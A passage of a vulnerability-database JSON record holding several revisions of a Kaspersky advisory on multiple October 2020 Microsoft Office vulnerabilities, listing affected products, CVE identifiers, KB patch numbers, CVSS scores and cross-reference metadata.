(32-bit editions) \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft Word 2013 RT Service Pack 1 \nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office Online Server \nMicrosoft Word 2016 (32-bit edition) \nMicrosoft Excel 2010 Service Pack 2 (32-bit editions) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft Outlook 2016 (32-bit edition) \nMicrosoft Word 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions) \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel Web App 2010 Service Pack 2 \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft Word 2016 (64-bit edition) \nMicrosoft SharePoint Server 2010 Service Pack 2 \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft Outlook 2016 (64-bit edition) \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Office Web Apps 2013 Service Pack 1 \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office 2019 for Mac \nMicrosoft Office 2016 for Mac \nMicrosoft Outlook 2010 Service Pack 2 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 64-bit editions\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16928](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16928>) \n[CVE-2020-16929](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16929>) \n[CVE-2020-16941](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16941>) \n[CVE-2020-16946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16946>) \n[CVE-2020-16947](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16947>) \n[CVE-2020-16944](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16944>) \n[CVE-2020-16945](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16945>) \n[CVE-2020-16948](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16948>) \n[CVE-2020-16949](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16949>) \n[CVE-2020-16942](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16942>) \n[CVE-2020-16932](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16932>) \n[CVE-2020-16952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16952>) \n[CVE-2020-16955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16955>) \n[CVE-2020-16954](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16954>) \n[CVE-2020-16951](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16951>) \n[CVE-2020-16950](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16950>) \n[CVE-2020-16953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16953>) \n[CVE-2020-16934](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16934>) \n[CVE-2020-16933](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16933>) \n[CVE-2020-16918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918>) \n[CVE-2020-16957](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16957>) \n[CVE-2020-16930](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16930>) \n[CVE-2020-16931](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16931>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2020-16918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16918>)0.0Unknown \n[CVE-2020-16928](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16928>)0.0Unknown \n[CVE-2020-16929](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16929>)0.0Unknown \n[CVE-2020-16941](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16941>)0.0Unknown \n[CVE-2020-16946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16946>)0.0Unknown \n[CVE-2020-16947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16947>)0.0Unknown \n[CVE-2020-16944](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16944>)0.0Unknown \n[CVE-2020-16945](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16945>)0.0Unknown \n[CVE-2020-16948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16948>)0.0Unknown \n[CVE-2020-16949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16949>)0.0Unknown \n[CVE-2020-16942](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16942>)0.0Unknown \n[CVE-2020-16932](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16932>)0.0Unknown \n[CVE-2020-16952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16952>)0.0Unknown \n[CVE-2020-16955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16955>)0.0Unknown \n[CVE-2020-16954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16954>)0.0Unknown \n[CVE-2020-16951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16951>)0.0Unknown \n[CVE-2020-16950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16950>)0.0Unknown \n[CVE-2020-16953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16953>)0.0Unknown \n[CVE-2020-16934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16934>)0.0Unknown \n[CVE-2020-16933](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16933>)0.0Unknown \n[CVE-2020-16957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16957>)0.0Unknown \n[CVE-2020-16930](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16930>)0.0Unknown \n[CVE-2020-16931](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16931>)0.0Unknown\n\n### *KB list*:\n[4486682](<http://support.microsoft.com/kb/4486682>) \n[4486678](<http://support.microsoft.com/kb/4486678>) \n[4484417](<http://support.microsoft.com/kb/4484417>) \n[4486676](<http://support.microsoft.com/kb/4486676>) \n[4486694](<http://support.microsoft.com/kb/4486694>) \n[4486707](<http://support.microsoft.com/kb/4486707>) \n[4486701](<http://support.microsoft.com/kb/4486701>) \n[4486687](<http://support.microsoft.com/kb/4486687>) \n[4486708](<http://support.microsoft.com/kb/4486708>) \n[4486677](<http://support.microsoft.com/kb/4486677>) \n[4486674](<http://support.microsoft.com/kb/4486674>) \n[4486688](<http://support.microsoft.com/kb/4486688>) \n[4484524](<http://support.microsoft.com/kb/4484524>) \n[4486663](<http://support.microsoft.com/kb/4486663>) \n[4486689](<http://support.microsoft.com/kb/4486689>) \n[4484531](<http://support.microsoft.com/kb/4484531>) \n[4486700](<http://support.microsoft.com/kb/4486700>) \n[4486679](<http://support.microsoft.com/kb/4486679>) \n[4486695](<http://support.microsoft.com/kb/4486695>) \n[4486703](<http://support.microsoft.com/kb/4486703>) \n[4484435](<http://support.microsoft.com/kb/4484435>) \n[4486692](<http://support.microsoft.com/kb/4486692>) \n[4462175](<http://support.microsoft.com/kb/4462175>) \n[4486671](<http://support.microsoft.com/kb/4486671>)", "published": "2020-10-13T00:00:00", "modified": "2020-10-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA11976", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2020-16932", "CVE-2020-16928", "CVE-2020-16957", "CVE-2020-16941", "CVE-2020-16947", "CVE-2020-16934", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16950", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16955", "CVE-2020-16929", "CVE-2020-16930", "CVE-2020-16933", "CVE-2020-16918", "CVE-2020-16931", "CVE-2020-16954", "CVE-2020-16952", "CVE-2020-16949"], "immutableFields": [], "lastseen": "2020-10-20T05:16:21", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2020-10-20T05:16:21", "references": [{"idList": ["KLA11974"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"], "type": "qualysblog"}, {"idList": ["THREATPOST:779B904F971138531725D1E57FDFF9DD"], "type": "threatpost"}, {"idList": ["SMB_NT_MS20_OCT_OFFICE.NASL", "SMB_NT_MS20_OCT_OFFICE_WEB.NASL", "SMB_NT_MS20_OCT_EXCEL.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2010.NASL", "MACOS_MS20_OCT_OFFICE.NASL", "SMB_NT_MS20_OCT_OUTLOOK.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_3D_VIEWER.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2020-16952", "MS:CVE-2020-16954", "MS:CVE-2020-16934", "MS:CVE-2020-16918", "MS:CVE-2020-16933", "MS:CVE-2020-16950", "MS:CVE-2020-16941", "MS:CVE-2020-16945", "MS:CVE-2020-16947", "MS:CVE-2020-16957"], "type": "mscve"}, {"idList": ["PACKETSTORM:159612"], "type": "packetstorm"}, {"idList": ["CVE-2020-16941", "CVE-2020-16947", "CVE-2020-16934", "CVE-2020-16950", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16955", "CVE-2020-16933", "CVE-2020-16918", "CVE-2020-16954"], "type": "cve"}, {"idList": ["ZDI-20-1250", "ZDI-20-1252", "ZDI-20-1253", "ZDI-20-1255", "ZDI-20-1249", "ZDI-20-1251", "ZDI-20-1256"], "type": "zdi"}, {"idList": ["THN:C3154ED3ABE28924B7CC42873DED19BB"], "type": "thn"}, {"idList": ["KREBS:7252221B56E65C46DEF83A6DDC0B70FB"], "type": "krebs"}], "rev": 2}, "score": {"modified": "2020-10-20T05:16:21", "rev": 2, "value": 6.8, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2020-10-20T05:16:21", "differentElements": ["cvss", "cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "KLA11976", "hash": "168ddcb15cd4f5a900c20a7ca94d0075", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA11976Multiple vulnerabilites in Microsoft Office ", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, spoof user interface, cause denial of service, bypass security restrictions.\n\n### *Affected products*:\nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Office 2013 RT Service Pack 1 \n3D Viewer \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Word 2013 Service Pack 1 (32-bit editions) \nMicrosoft SharePoint Foundation 2010 Service Pack 2 \nMicrosoft Word 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 32-bit editions \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2010 Service Pack 2 (64-bit editions) \nMicrosoft Word 2010 Service Pack 2 (32-bit editions) \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft Word 2013 RT Service Pack 1 \nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office Online Server \nMicrosoft Word 2016 (32-bit edition) \nMicrosoft Excel 2010 Service Pack 2 (32-bit editions) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft Outlook 2016 (32-bit edition) \nMicrosoft Word 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions) \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel Web App 2010 Service Pack 2 \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft Word 2016 (64-bit edition) \nMicrosoft SharePoint Server 2010 Service Pack 2 \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft Outlook 2016 (64-bit edition) \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Office Web Apps 2013 Service Pack 1 \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office 2019 for Mac \nMicrosoft Office 2016 for Mac \nMicrosoft Outlook 2010 Service Pack 2 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 64-bit editions\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16928](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16928>) \n[CVE-2020-16929](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16929>) \n[CVE-2020-16941](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16941>) \n[CVE-2020-16946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16946>) \n[CVE-2020-16947](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16947>) \n[CVE-2020-16944](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16944>) \n[CVE-2020-16945](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16945>) \n[CVE-2020-16948](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16948>) \n[CVE-2020-16949](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16949>) \n[CVE-2020-16942](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16942>) \n[CVE-2020-16932](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16932>) \n[CVE-2020-16952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16952>) \n[CVE-2020-16955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16955>) \n[CVE-2020-16954](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16954>) \n[CVE-2020-16951](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16951>) \n[CVE-2020-16950](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16950>) \n[CVE-2020-16953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16953>) \n[CVE-2020-16934](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16934>) \n[CVE-2020-16933](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16933>) \n[CVE-2020-16918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918>) \n[CVE-2020-16957](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16957>) \n[CVE-2020-16930](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16930>) \n[CVE-2020-16931](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16931>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2020-16918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16918>)0.0Unknown \n[CVE-2020-16928](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16928>)0.0Unknown \n[CVE-2020-16929](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16929>)0.0Unknown \n[CVE-2020-16941](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16941>)0.0Unknown \n[CVE-2020-16946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16946>)0.0Unknown \n[CVE-2020-16947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16947>)0.0Unknown \n[CVE-2020-16944](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16944>)0.0Unknown \n[CVE-2020-16945](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16945>)0.0Unknown \n[CVE-2020-16948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16948>)0.0Unknown \n[CVE-2020-16949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16949>)0.0Unknown \n[CVE-2020-16942](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16942>)0.0Unknown \n[CVE-2020-16932](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16932>)0.0Unknown \n[CVE-2020-16952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16952>)0.0Unknown \n[CVE-2020-16955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16955>)0.0Unknown \n[CVE-2020-16954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16954>)0.0Unknown \n[CVE-2020-16951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16951>)0.0Unknown \n[CVE-2020-16950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16950>)0.0Unknown \n[CVE-2020-16953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16953>)0.0Unknown \n[CVE-2020-16934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16934>)0.0Unknown \n[CVE-2020-16933](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16933>)0.0Unknown \n[CVE-2020-16957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16957>)0.0Unknown \n[CVE-2020-16930](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16930>)0.0Unknown \n[CVE-2020-16931](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16931>)0.0Unknown\n\n### *KB list*:\n[4486682](<http://support.microsoft.com/kb/4486682>) \n[4486678](<http://support.microsoft.com/kb/4486678>) \n[4484417](<http://support.microsoft.com/kb/4484417>) \n[4486676](<http://support.microsoft.com/kb/4486676>) \n[4486694](<http://support.microsoft.com/kb/4486694>) \n[4486707](<http://support.microsoft.com/kb/4486707>) \n[4486701](<http://support.microsoft.com/kb/4486701>) \n[4486687](<http://support.microsoft.com/kb/4486687>) \n[4486708](<http://support.microsoft.com/kb/4486708>) \n[4486677](<http://support.microsoft.com/kb/4486677>) \n[4486674](<http://support.microsoft.com/kb/4486674>) \n[4486688](<http://support.microsoft.com/kb/4486688>) \n[4484524](<http://support.microsoft.com/kb/4484524>) \n[4486663](<http://support.microsoft.com/kb/4486663>) \n[4486689](<http://support.microsoft.com/kb/4486689>) \n[4484531](<http://support.microsoft.com/kb/4484531>) \n[4486700](<http://support.microsoft.com/kb/4486700>) \n[4486679](<http://support.microsoft.com/kb/4486679>) \n[4486695](<http://support.microsoft.com/kb/4486695>) \n[4486703](<http://support.microsoft.com/kb/4486703>) \n[4484435](<http://support.microsoft.com/kb/4484435>) \n[4486692](<http://support.microsoft.com/kb/4486692>) \n[4462175](<http://support.microsoft.com/kb/4462175>) \n[4486671](<http://support.microsoft.com/kb/4486671>)", "published": "2020-10-13T00:00:00", "modified": "2020-10-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA11976", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2020-16932", "CVE-2020-16928", "CVE-2020-16957", "CVE-2020-16941", "CVE-2020-16947", "CVE-2020-16934", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16950", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16955", "CVE-2020-16929", "CVE-2020-16930", "CVE-2020-16933", "CVE-2020-16918", "CVE-2020-16931", "CVE-2020-16954", "CVE-2020-16952", "CVE-2020-16949"], "immutableFields": [], "lastseen": "2020-11-03T05:37:58", "history": [], "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112737", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2010.NASL", "MACOS_MS20_OCT_OFFICE.NASL", "WEB_APPLICATION_SCANNING_112740", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE.NASL", "WEB_APPLICATION_SCANNING_112738", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "WEB_APPLICATION_SCANNING_112739", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL"]}, {"type": "mskb", "idList": ["KB4486682", "KB4486678", "KB4486677", "KB4486694", "KB4486708", "KB4486707", "KB4486689", "KB4486674", "KB4486676", "KB4486695"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/", "MSF:ILITIES/MSFT-CVE-2020-16951/"]}, {"type": "cve", "idList": ["CVE-2020-16946", "CVE-2020-16955", "CVE-2020-16954", "CVE-2020-16953", "CVE-2020-16950", "CVE-2020-16957", "CVE-2020-16933", "CVE-2020-16945", "CVE-2020-16934", "CVE-2020-16918"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB"]}, {"type": "attackerkb", "idList": ["AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"]}, {"type": "mscve", "idList": ["MS:CVE-2020-16930", "MS:CVE-2020-16950", "MS:CVE-2020-16933", "MS:CVE-2020-16934", "MS:CVE-2020-16945", "MS:CVE-2020-16957", "MS:CVE-2020-16954", "MS:CVE-2020-16941", "MS:CVE-2020-16918", "MS:CVE-2020-16955"]}, {"type": "zdi", "idList": ["ZDI-20-1255", "ZDI-20-1256", "ZDI-20-1249", "ZDI-20-1250", "ZDI-20-1253", "ZDI-20-1251", "ZDI-20-1252"]}, {"type": "cisa", "idList": ["CISA:48962A3B37B032DCF622B3E3135B8A1A"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612"]}, {"type": "kaspersky", "idList": ["KLA11974"]}], "modified": "2020-11-03T05:37:58", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-11-03T05:37:58", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2020-11-03T05:37:58", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "KLA11976", "hash": "f3769a2ca2403007b527a31472f977354263baf26271cba35970c2c521d8145a", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA11976Multiple vulnerabilites in Microsoft Office ", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, spoof user interface, cause denial of service, bypass security restrictions.\n\n### *Affected products*:\nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Office 2013 RT Service Pack 1 \n3D Viewer \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Word 2013 Service Pack 1 (32-bit editions) \nMicrosoft SharePoint Foundation 2010 Service Pack 2 \nMicrosoft Word 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 32-bit editions \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2010 Service Pack 2 (64-bit editions) \nMicrosoft Word 2010 Service Pack 2 (32-bit editions) \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft Word 2013 RT Service Pack 1 \nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office Online Server \nMicrosoft Word 2016 (32-bit edition) \nMicrosoft Excel 2010 Service Pack 2 (32-bit editions) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft Outlook 2016 (32-bit edition) \nMicrosoft Word 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions) \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel Web App 2010 Service Pack 2 \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft Word 2016 (64-bit edition) \nMicrosoft SharePoint Server 2010 Service Pack 2 \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft Outlook 2016 (64-bit edition) \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Office Web Apps 2013 Service Pack 1 \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office 2019 for Mac \nMicrosoft Office 2016 for Mac \nMicrosoft Outlook 2010 Service Pack 2 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 64-bit editions\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16928](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16928>) \n[CVE-2020-16929](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16929>) \n[CVE-2020-16941](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16941>) \n[CVE-2020-16946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16946>) 